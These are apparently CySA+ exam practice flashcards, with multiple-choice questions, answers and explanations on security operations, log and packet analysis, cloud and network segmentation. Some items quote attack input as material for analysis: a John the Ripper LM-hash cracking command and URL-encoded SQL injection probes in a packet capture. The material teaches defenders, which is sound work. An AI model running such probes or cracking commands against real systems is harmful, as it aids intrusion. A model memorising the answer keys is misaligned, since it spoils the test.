Practice Tests - Chapter 1: Domain 1.0: Security Operations Flashcards
4- What term is used to describe the groups of related organizations that pool resources to share cybersecurity threat information and analyses?
- SOC
- ISAC
- CERT
- CIRT
ISAC
The Department of Homeland Security collaborates with industry through information sharing and analysis centers (ISACs). These ISACs cover industries such as healthcare, financial, aviation, government, and critical infrastructure.
ISAC
Information Sharing and Analysis Centers
groups of related organizations that pool resources to share cybersecurity threat information and analyses
5- Singh incorporated the Cisco Talos tool into his organization’s threat intelligence program. He uses it to automatically look up information about the past activity of IP addresses sending email to his mail servers. What term best describes this intelligence source?
- Open source
- Behavioral
- Reputational
- Indicator of compromise
Reputational
This source provides information about IP addresses based on past behavior. This makes it a reputational source. A behavioral source would look at information about current behavior. This is a product offered by Cisco and is proprietary, not open source. It does not provide indicators that would help you determine whether your system had been compromised.
6- Jamal is assessing the risk to his organization from their planned use of AWS Lambda, a serverless computing service that allows developers to write code and execute functions directly on the cloud platform. What cloud tier best describes this service?
- SaaS
- PaaS
- IaaS
- FaaS
FaaS
This is an example of function‐as‐a‐service (FaaS) computing. A service like Lambda could also be described as platform‐as‐a‐service (PaaS), because FaaS is a subset of PaaS. However, the term FaaS is the one that best describes this service.
8- Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2020-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2020-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2020-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2020-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2020-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2020-07-11 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2020-07-11 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2020-07-11 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2020-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2020-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2020-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2020-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2020-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2020-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2020-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2020-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
- 1
- 3
- 4
- 5
4
This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5.
9- Which one of the following functions is not a common recipient of threat intelligence information?
- Legal counsel
- Risk management
- Security engineering
- Detection and monitoring
Legal counsel
Threat intelligence information is not commonly shared with legal counsel on a routine basis. CompTIA’s CySA+ objectives list the following common recipients: incident response, vulnerability management, risk management, security engineering, and detection and monitoring.
10- Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment for use only by other Portuguese universities. What type of cloud deployment model is he using?
- Public cloud
- Private cloud
- Hybrid cloud
- Community cloud
Community cloud
Community clouds are cloud computing environments available only to members of a collaborative community, such as a set of universities. Public clouds are available to any customers who want to use them. Private clouds are for the use of the organization building the cloud only. Hybrid clouds mix elements of public and private clouds in an enterprise computing strategy.
Remanence
The magnetic flux density remaining in a material after an external magnetic field is removed
12- The company that Maria works for is making significant investments in infrastructure‐as‐a‐service hosting to replace its traditional datacenter. Members of her organization’s management have expressed concerns about data remanence when her team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?
- Zero‐wipe drives before moving systems.
- Use full‐disk encryption.
- Use data masking.
- Span multiple virtual disks to fragment data.
Use full‐disk encryption.
Maria’s team should use full‐disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. Although many cloud providers have implemented technology to ensure that this won’t happen, Maria can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. Using a zero‐wipe is often impossible because virtual environments may move without her team’s intervention, data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed, and spanning multiple virtual disks will still leave data accessible, albeit possibly in fragmented form.
Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN server using many different username and password combinations. The same usernames are attempted several hundred times before moving on to the next one. What type of attack is most likely taking place?
- Credential stuffing
- Password spraying
- Brute‐force
- Rainbow table
Password spraying
In a password spraying attack, the attacker tries a set of common passwords using many different accounts. The activity Geoff sees is consistent with this type of attack. Credential stuffing attacks seek to use username/password lists stolen from another site to log on to a different site. This would result in only one login attempt per username. Brute‐force attacks would result in thousands or millions of attempts per username. Rainbow table attacks take place offline and would not be reflected in the logs.
Credential stuffing
Credential stuffing attacks occur when an attacker takes a list of usernames and passwords that were stolen in the compromise of one website and uses them to attempt to gain access to a different, potentially unrelated, website. Credential stuffing attacks are successful when users reuse the same password across many different sites.
Password spraying
Password spraying attacks occur when an attacker uses a list of common passwords and attempts to log into many different user accounts with those common passwords. The attacker only needs to find one valid username/password combination to gain access to the system. This attack is successful when users do not choose sufficiently unique passwords.
14- Kaiden is configuring a SIEM service in his IaaS cloud environment that will receive all of the log entries generated by other devices in that environment. Which one of the following risks is greatest with this approach in the event of a DoS attack or other outage?
- Inability to access logs
- Insufficient logging
- Insufficient monitoring
- Insecure API
Inability to access logs
The greatest risk in the event of a DoS attack is that the logs are stored in the same cloud environment that is under attack. Cybersecurity professionals may not be able to access those logs to investigate the incident.
15- Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past the user’s desktop, she sees the following command on the screen:
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
- They are attempting to hash a file.
- They are attempting to crack hashed passwords.
- They are attempting to crack encrypted passwords.
- They are attempting a pass‐the‐hash attack.
They are attempting to crack hashed passwords.
Azra’s suspicious user appears to be attempting to crack LANMAN hashes using a custom word list. The key clues here are the john application, the LM hash type, and the location of the word list.
16- Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on:
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
- 508
- 617
- 846
- 714
714
The service running from the www directory as the user apache should be an immediate indication of something strange, and the use of webmin from that directory should also be a strong indicator of something wrong. Lucas should focus on the web server for the point of entry to the system and should review any files that the Apache user has created or modified. If local vulnerabilities existed when this compromise occurred, the attacker may have already escalated to another account!
17- Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services, including telnet, FTP, and web servers. What is his best option to secure these systems?
- Enable host firewalls.
- Install patches for those services.
- Turn off the services for each appliance.
- Place a network firewall between the devices and the rest of the network.
Place a network firewall between the devices and the rest of the network.
Geoff’s only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don’t have patches available, and many appliances do not allow the services they provide to be disabled or modified.
18- While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self‐signed. What issue should he report to his management?
- Self‐signed certificates do not provide secure encryption for site visitors.
- Self‐signed certificates can be revoked only by the original creator.
- Self‐signed certificates will cause warnings or error messages.
- None of the above.
Self‐signed certificates will cause warnings or error messages.
Using self‐signed certificates for services that will be used by the general public or organizational users outside of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self‐signed, and a self‐signed certificate cannot be revoked at all.
19- Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?
- AFRINIC
- APNIC
- RIPE
- LACNIC
RIPE
Brandon should select RIPE, the regional Internet registry for Europe, the Middle East, and parts of Central Asia. AFRINIC serves Africa, APNIC serves the Asia/Pacific region, and LACNIC serves Latin America and the Caribbean.
AFRINIC
the regional Internet registry for Africa
APNIC
the regional Internet registry for Asia/Pacific region
RIPE
the regional Internet registry for Europe, the Middle East, and parts of Central Asia
LACNIC
the regional Internet registry for Latin America and the Caribbean.
20- While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP address. What should Janet report has occurred?
[21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
- A denial‐of‐service attack
- A vulnerability scan
- A port scan
- A directory traversal attack
A vulnerability scan
Testing for common sample and default files is a common tactic for vulnerability scanners. Janet can reasonably presume that her Apache web server was scanned using a vulnerability scanner.
21- Scott is part of the white team that is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?
Wireshark capture (seventeen rows; columns are Number, Time, Source, Destination, Protocol, Length, Info):
No.  Time         Source     Destination  Proto  Len  Info
2180 2.493035366  10.0.2.4   10.0.2.15    TCP    66   80 → 55554 [FIN, ACK] Seq=507 Ack=420 Win=6880 Len=0 TSval=127193 TSecr=317472
2181 2.493271630  10.0.2.15  10.0.2.4     TCP    66   55554 → 80 [FIN, ACK] Seq=420 Ack=508 Win=30336 Len=0 TSval=317472 TSecr=127193
2182 2.493462055  10.0.2.4   10.0.2.15    TCP    66   80 → 55554 [ACK] Seq=508 Ack=421 Win=6880 Len=0 TSval=127193 TSecr=317472
2183 2.496331161  10.0.2.15  10.0.2.4     TCP    66   55552 → 80 [FIN, ACK] Seq=413 Ack=503 Win=30336 Len=0 TSval=317472 TSecr=127192
2184 2.496386675  10.0.2.15  10.0.2.4     TCP    74   55556 → 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317473 TSecr=0 WS=128
2185 2.496500116  10.0.2.4   10.0.2.15    TCP    66   80 → 55552 [ACK] Seq=503 Ack=414 Win=6880 Len=0 TSval=127193 TSecr=317473
2186 2.496520426  10.0.2.4   10.0.2.15    TCP    74   80 → 55556 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127193 TSecr=317
2187 2.496527886  10.0.2.15  10.0.2.4     TCP    66   55556 → 80 [SYN] Seq=1 Ack=1 Win=29312 Len=0 TSval=317473 TSecr=127193
2188 2.497238098  10.0.2.15  10.0.2.4     HTTP   492  GET /twiki/%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
2189 2.497404022  10.0.2.4   10.0.2.15    TCP    66   80 → 55556 [ACK] Seq=1 Ack=427 Win=6880 Len=0 TSval=127193 TSecr=317473
2190 2.497648036  10.0.2.4   10.0.2.15    HTTP   577  HTTP/1.1 404 Not Found (text/html)
2191 2.497665375  10.0.2.15  10.0.2.4     TCP    66   55556 → 80 [ACK] Seq=427 Ack=512 Win=30336 Len=0 TSval=317473 TSecr=127194
2192 2.497680491  10.0.2.4   10.0.2.15    TCP    66   80 → 55556 [FIN, ACK] Seq=512 Ack=427 Win=6880 Len=0 TSval=127194 TSecr=317473
2193 2.502043782  10.0.2.15  10.0.2.4     TCP    74   55558 → 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317474 TSecr=0 WS=128
2194 2.502267987  10.0.2.4   10.0.2.15    TCP    74   80 → 55558 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127194 TSecr=317
2195 2.502294637  10.0.2.15  10.0.2.4     TCP    66   55558 → 80 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=317474 TSecr=127194
2196 2.502356539  10.0.2.15  10.0.2.4     HTTP   499  GET /twiki/%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
- The blue team has succeeded.
- The red team is violating the rules of engagement.
- The red team has succeeded.
- The blue team is violating the rules of engagement.
The red team is violating the rules of engagement.
This capture shows SQL injection attacks being attempted. We can determine this from the SQL keywords (e.g., UNION ALL) that appear in packets 2188 and 2196. Since this is the reconnaissance phase, the red team should not be actively attempting to exploit vulnerabilities and has violated the rules of engagement.
22- Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?
- LDAPS and HTTPS
- FTPS and HTTPS
- RDP and HTTPS
- HTTP and Secure DNS
LDAPS and HTTPS
TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 443. Although other services could use these ports, Jennifer’s best bet is to presume that they will be providing the services they are typically associated with.
28- Wang submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?
Signatures
A process attempted to delay the analysis task.
File has been identified by at least one AntiVirus on VirusTotal as malicious
The binary likely contains encrypted or compressed data.
Creates a windows hook that monitors keyboard input (keylogger)
Creates an Alternate Data Stream (ADS)
Installs itself for autorun at Windows startup
- A reverse‐engineering tool
- A static analysis sandbox
- A dynamic analysis sandbox
- A decompiler sandbox
A dynamic analysis sandbox
Wang’s screenshot shows behavioral analysis of the executed code. From this, you can determine that malwr is a dynamic analysis sandbox that runs the malware sample to determine what it does while also analyzing the file.
30- Sarah has been asked to assess the technical impact of suspected reconnaissance performed against her organization. She is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Sarah categorize the technical impact of this type of reconnaissance?
- High.
- Medium.
- Low.
- She cannot determine this from the information given.
Low.
Sarah knows that domain registration information is publicly available and that her organization controls the data that is published. Since this does not expose anything that she should not expect to be accessible, she should categorize this as a low impact.
What does an ICMP echo request indicate?
Indicates that someone is doing a ping sweep
32- Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?
check picture in book
- The host does not have a DNS entry.
- It is running a service on port 139.
- It is running a service on port 445.
- It is a Windows system.
The host does not have a DNS entry.
While the system responded on common Windows ports, you cannot determine whether it is a Windows system. It did respond, and both ports 139 and 445 were accessible. When the host the Wireshark capture was conducted from queried DNS, it did not receive a response, indicating that the system does not have a DNS entry (or at least, it doesn’t have one that is available to the host that did the scan and ran the Wireshark capture).
34- What purpose does a honeypot system serve when placed on a network as shown in the following diagram?
See picture in book
- It prevents attackers from targeting production servers.
- It provides information about the techniques attackers are using.
- It slows down attackers like sticky honey.
- It provides real‐time input to IDSs and IPSs.
It provides information about the techniques attackers are using.
A honeypot is used by security researchers and practitioners to gather information about techniques and tools used by attackers. A honeypot will not prevent attackers from targeting other systems, and unlike a tarpit, it is not designed to slow down attackers. Typically, honeypot data must be analyzed to provide useful information that can be used to build IDS and IPS rules.
35- A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique?
- A passive defense
- A sticky defense
- An active defense
- A reaction‐based defense
An active defense
Tarpits are a form of active defense that decoy or bait attackers. Passive defenses include cryptography, security architecture, and similar options. Sticky defenses and reaction‐based defenses were made up for this question.
36- Susan needs to test thousands of submitted binaries. She needs to ensure that the applications do not contain malicious code. What technique is best suited to this need?
- Sandboxing
- Implementing a honeypot
- Decompiling and analyzing the application code
- Fagan testing
Sandboxing
Susan’s best option is to use an automated testing sandbox that analyzes the applications for malicious or questionable behavior. Although this may not catch every instance of malicious software, the only other viable option is decompiling the applications and analyzing the code, which would be incredibly time‐consuming. Since she doesn’t have the source code, Fagan inspection won’t work (and would take a long time too), and running a honeypot is used to understand hacker techniques, not to directly analyze application code.
37- Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message?
root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did NOT match
- The file has been corrupted.
- Attackers have modified the file.
- The files do not match.
- The test failed and provided no answer.
The files do not match.
Manesh knows that the file she downloaded and computed a checksum for does not match the MD5 checksum that was calculated by the providers of the software. She does not know if the file has been corrupted or if attackers have modified the file, but she may want to contact the providers of the software to let them know about the issue—and she definitely shouldn’t execute or trust the file!
41- Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
- Submit cmd.exe to VirusTotal.
- Compare the hash of cmd.exe to a known good version.
- Check the file using the National Software Reference Library.
- Run cmd.exe to make sure its behavior is normal.
Submit cmd.exe to VirusTotal.
Susan’s best option is to submit the file to a tool like VirusTotal that will scan it for virus‐like behaviors and known malware tools. Checking the hash either by using a manual check or by using the National Software Reference Library can tell her if the file matches a known good version but won’t tell her if it includes malware. Running a suspect file is the worst option on the list.
42- Nishi is deploying a new application that will process sensitive health information about her organization’s clients. To protect this information, the organization is building a new network that does not share any hardware or logical access credentials with the organization’s existing network. What approach is Nishi adopting?
- Network interconnection
- Network segmentation
- Virtual LAN (VLAN) isolation
- Virtual private network (VPN)
Network segmentation
The strategy outlined by Nishi is one of network segmentation—placing separate functions on separate networks. She is explicitly not interconnecting the two networks. VPNs and VLANs are also technologies that could assist with the goal of protecting sensitive information, but they use shared hardware and would not necessarily achieve the level of isolation that Nishi requires.
43- Bobbi is deploying a single system that will be used to manage a sensitive industrial control process. This system will operate in a stand‐alone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system?
- Network segmentation
- VLAN isolation
- Airgapping
- Logical isolation
Airgapping
Bobbi is adopting a physical, not logical, isolation strategy. In this approach, known as air‐gapping, the organization uses a stand‐alone system for the sensitive function that is not connected to any other system or network, greatly reducing the risk of compromise. VLAN isolation and network segmentation involve a degree of interconnection that is not present in this scenario.
46- Which one of the following technologies is not typically used to implement network segmentation?
- Host firewall
- Network firewall
- VLAN tagging
- Routers and switches
Host firewall
Host firewalls operate at the individual system level and, therefore, cannot be used to implement network segmentation. Routers and switches may be used for this purpose by either physically separating networks or implementing VLAN tagging. Network firewalls may also be used to segment networks into different zones.
47- Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization’s buildings. What type of segmentation should he implement to do so without adding additional costs and complexity?
- SSID segmentation
- Logical segmentation
- Physical segmentation
- WPA segmentation
Logical segmentation
Ian knows that deploying multiple access points in the same space to deploy a physically segmented wireless network would significantly increase both the costs of deployment and the complexity of the network due to access points causing conflicts. His best choice is to logically segment his networks using one set of access points. SSID and WPA segmentation are both made‐up terms for this question.
49- What major issue would Charles face if he relied on hashing malware packages to identify malware packages?
- Hashing can be spoofed.
- Collisions can result in false positives.
- Hashing cannot identify unknown malware.
- Hashing relies on unencrypted malware samples.
Hashing cannot identify unknown malware.
Relying on hashing means that Charles will be able to identify only the specific versions of malware packages that have already been identified. This is a consistent problem with signature‐based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes due to changes meant to avoid signature‐based detection systems.
52- Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.
Angela has decided to roll out a multifactor authentication system. What are the two most common factors used in MFA systems?
- Location and knowledge
- Knowledge and possession
- Knowledge and biometric
- Knowledge and location
Knowledge and possession
The most common factors for multifactor systems today are knowledge factors (like a password) and possession factors, which can include a token, an authenticator application, or a smartcard.
53- Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.
Angela’s multifactor deployment includes the ability to use text (SMS) messages to send the second factor for authentication. What issues should she point to?
- VoIP hacks and SIM swapping.
- SMS messages are logged on the recipient’s phones.
- PIN hacks and SIM swapping.
- VoIP hacks and PIN hacks.
VoIP hacks and SIM swapping.
NIST has pointed out that SMS is a relatively insecure way to deliver codes as part of a multifactor authentication system. The two most common attacks against SMS message delivery are VoIP hacks, where SMS messages may be delivered to a VoIP system, which can be accessed by an attacker, and SIM swapping attacks, where a SIM card is cloned and SMS messages are also delivered to an attacker.
54- What purpose does the OpenFlow protocol serve in software‐defined networks?
- It captures flow logs from devices.
- It allows software‐defined network controllers to push changes to devices to manage the network.
- It sends flow logs to flow controllers.
- It allows devices to push changes to SDN controllers to manage the network.
It allows software‐defined network controllers to push changes to devices to manage the network.
OpenFlow is used to allow software‐defined network (SDN) controllers to push changes to switches and routers, allowing flow control, network traffic partitioning, and testing of applications and configurations.
OpenFlow
OpenFlow is an API (application programming interface) that allows for the central control of networks, which makes networks programmable through software-defined networking (SDN).
The OpenFlow protocol is used to allow software-defined network (SDN) controllers to push changes to switches and routers, allowing flow control, network traffic partitioning, and testing of applications and configurations.
55- Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?
- A tarpit
- A honeypot
- A honeynet
- A blackhole
A honeynet
Rick’s team has set up a honeynet—a group of systems set up to attract attackers while capturing the traffic they send and the tools and techniques they use. A honeypot is a single system set up in a similar way, whereas a tarpit is a system set up to slow down attackers. A blackhole is often used on a network as a destination for traffic that will be silently discarded.
56- Kalea wants to prevent DoS attacks against her serverless application from driving up her costs when using a cloud service. What technique is not an appropriate solution for her need?
- Horizontal scaling
- API keys
- Setting a cap on API invocations for a given timeframe
- Using timeouts
Horizontal scaling
Scaling a serverless system is a useful way to handle additional traffic but will not prevent denial‐of‐service (DoS) attacks from driving additional cost. In fact, horizontal scaling will add additional costs as it scales. API keys can be used to prevent unauthorized use of the serverless application, and keys can be deprovisioned if they are abused. Capping API invocations and using timeouts can help limit the maximum number of uses and how much they are used, both of which can help prevent additional costs.
57- What is the key difference between virtualization and containerization?
- Virtualization gives operating systems direct access to the hardware, whereas containerization does not allow applications to directly access the hardware.
- Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.
- Virtualization is necessary for containerization, but containerization is not necessary for virtualization.
- There is not a key difference; they are elements of the same technology.
Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.
Virtualization allows you to run multiple operating systems on the same underlying hardware, whereas containerization lets you deploy multiple applications on the same operating system on a single system. Containerization can allow direct hardware access, whereas virtualization typically does not. Virtualization is not necessary for containerization, although it is often used, but containerization can get performance improvements from bare‐metal installations. Finally, there is a key difference, as noted in option B.
58- Brandon is designing the hosting environment for containerized applications. Application group A has personally identifiable information, application group B has health information with different legal requirements for handling, and application group C has business‐sensitive data handling requirements. What is the most secure design for his container orchestration environment given the information he has?
- Run a single, highly secured container host with encryption for data at rest.
- Run a container host for each application group and secure them based on the data they contain.
- Run a container host for groups A and B, and run a lower‐security container host for group C.
- Run a container host for groups A and C, and run a health information–specific container host for group B due to the health information it contains.
Run a container host for each application group and secure them based on the data they contain.
Workloads in a secure containerization environment should be distributed in a way that allows hosts to run containers of only a specific security level. Since Brandon has three different security levels in his environment, he should use separate hosts that can be configured to secure the data appropriately while also limiting the impact if a container is breached.
61- Facebook Connect, CAS, Shibboleth, and AD FS are all examples of what type of technology?
- Kerberos implementations
- Single sign‐on implementations
- Federation technologies
- OAuth providers
Single sign‐on implementations
All of these are examples of single sign‐on (SSO) implementations. They allow a user to use a single set of credentials to log in to multiple different services and applications. When federated, SSO can also allow a single account to work across a variety of services from multiple organizations.
63- Naomi wants to enforce her organization’s security policies on cloud service users. What technology is best suited to this?
- OAuth
- CASB
- OpenID
- DMARC
CASB
A cloud access security broker (CASB) can perform actions such as monitoring activity, managing cloud security policies for SaaS services, enforcing security policies, logging, alerting, and in‐line policy enforcement when deployed with agents on endpoint devices or as a proxy.
64- Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network?
- TLS
- SSL
- IPsec
- PPTP
TLS
Transport Layer Security (TLS) is used to secure web and other types of traffic. Many people still call TLS SSL out of habit, but TLS is actually a different protocol and has replaced Secure Sockets Layer (SSL). IPsec is an encryption protocol used for VPNs and other point‐to‐point connections between networks. Point‐to‐Point Tunneling Protocol (PPTP) has a number of security issues.
66- What term is used to describe defenses that obfuscate the attack surface of an organization by deploying decoys and attractive targets to slow down or distract an attacker?
- An active defense
- A honeyjar
- A bear trap
- An interactive defense
An active defense
Active defenses are aimed at slowing down attackers while using their resources. The rest of the terms listed here were made up for this question. Active defenses are sometimes referred to as deception technology.
69- What type of access is typically required to compromise a physically isolated and air‐gapped system?
- Wired network access
- Physical access
- Wireless network access
- None of the above, because an isolated, air‐gapped system cannot be accessed
Physical access
Physical access is the best (and often only) way to compromise an air‐gapped, physically isolated system. Although some esoteric attack methods can gather information via RF, acoustic, or other leakage, real‐world scenarios will require physical access in almost all cases.
71- Which of the following parties directly communicate with the end user during a SAML transaction?
- The relying party
- The SAML identity provider
- Both the relying party and the identity provider
- Neither the relying party nor the identity provider
Both the relying party and the identity provider
In a SAML transaction, the user initiates a request to the relying party, who then redirects the user to the SSO provider. The user then authenticates to the SAML identity provider and receives a SAML response, which is sent to the relying party as proof of identity.
72- Support for AES, 3DES, ECC, and SHA‐256 are all examples of what?
- Encryption algorithms
- Hashing algorithms
- Processor security extensions
- Bus encryption modules
Processor security extensions
These are all examples of processor security extensions providing additional cryptographic instructions. Since AES, 3DES, and ECC are all encryption algorithms and SHA‐256 is a hashing algorithm, we know that this can’t be either of the first two options alone. Bus encryption may use these, but they aren’t just examples of bus encryption algorithms.
73- Which of the following is not a benefit of physical segmentation?
- Easier visibility into traffic
- Improved network security
- Reduced cost
- Increased performance
Reduced cost
Although physical segmentation can make it easier to see specific traffic while providing better network security and increased performance, running a separate infrastructure is rarely a less expensive option.
75- Which of the following is not a common use case for network segmentation?
- Creating a VoIP network
- Creating a shared network
- Creating a guest wireless network
- Creating trust zones
Creating a shared network
Segmented networks are almost always used to isolate groups rather than to combine them. Common uses include specific network segments for VoIP, wireless, or specific trust zones and levels.
76- What three layers make up a software‐defined network?
- Application, Datagram, and Physical layers
- Application, Control, and Infrastructure layers
- Control, Infrastructure, and Session layers
- Data link, Presentation, and Transport layers
Application, Control, and Infrastructure layers
Software‐defined networks (SDNs) consist of three major layers: the application layer, where information about the network is used to improve flow, configuration, and other items; the control layer, which is where the logic from SDN controllers controls the network infrastructure; and the infrastructure layer, which is made up of the networking equipment. If you’re not deeply familiar with SDNs, you can address questions like this by reviewing what you do know. The other three options contain elements of the OSI model but don’t make sense in the context of SDN.
77- Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this?
- Automated checking of application hashes against known good versions
- Automated vulnerability scanning
- Automated fuzz testing
- Automated updates
Automated vulnerability scanning
If Micah implements automated vulnerability scanning, he can check to see if the applications that are about to be deployed have known vulnerabilities. Automated patching will also help with this, but will only apply available patches and will not assess whether there are configuration vulnerabilities or unpatched vulnerabilities. Fuzz testing can help to test if the applications have issues with unexpected input but will not address most vulnerabilities, and hashing will only tell him if he is running the version of code that he expects to, not if it is vulnerable.
78- Camille wants to integrate with a federation. What will she need to authenticate her users to the federation?
- An IDP
- A SP
- An API gateway
- An SSO server
An IDP
Camille will need to integrate her identity provider (IDP) to provide authentication and authorization. Once users are authenticated, they can use various service providers throughout the federation. She will also probably want to use some form of single sign‐on (SSO) service, but it is not required to be part of a federation.
79- Answer the question based on your knowledge of container security and the following scenario.
Brandon has been tasked with designing the security model for container use in his organization. He is working from the NIST SP 800‐190 document and wants to follow NIST recommendations wherever possible.
